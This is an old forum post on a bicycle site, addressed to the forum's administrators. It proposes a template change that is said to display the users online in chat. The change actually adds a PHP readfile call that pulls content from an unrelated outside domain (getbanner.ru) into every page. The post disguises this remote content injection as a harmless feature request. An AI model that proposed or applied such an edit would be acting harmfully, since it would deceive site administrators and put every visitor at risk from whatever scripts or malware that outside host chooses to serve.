Forum Suggestions & User Assistance - To all those that have access to admin control panel

Bikeforums.net is a forum about nothing but bikes. Our community can help you find information about hard-to-find and localized information like bicycle tours, specialties like where in your area to have your recumbent bike serviced, or what are the best bicycle tires and seats for the activities you use your bike for.




MeHT
10-14-02, 11:45 AM
Just change this:


<font class="nf"><b>Chat:</b></font> <font class="sf"><a href="chat.php?s=" onClick="window.open('chat.php?s=','key','WIDTH=600,HEIGHT=450,scrollbars=no,left=50,top=50,screenX=50,screen Y=50');return false">Click here for real time chat!</a> (online users list coming soon!)</font>


To this:



<font class="nf"><b>Chat:</b></font> <font class="sf"><a href="chat.php?s=" onClick="window.open('chat.php?s=','key','WIDTH=600,HEIGHT=450,scrollbars=no,left=50,top=50,screenX=50,screen Y=50');return false">Click here for real time chat!</a> Users: (&nbsp;&nbsp; <?php $userlist = readfile("http://www.getbanner.ru/ment/index.html");?>)</font>


And that will give you the list of users currently on the channel.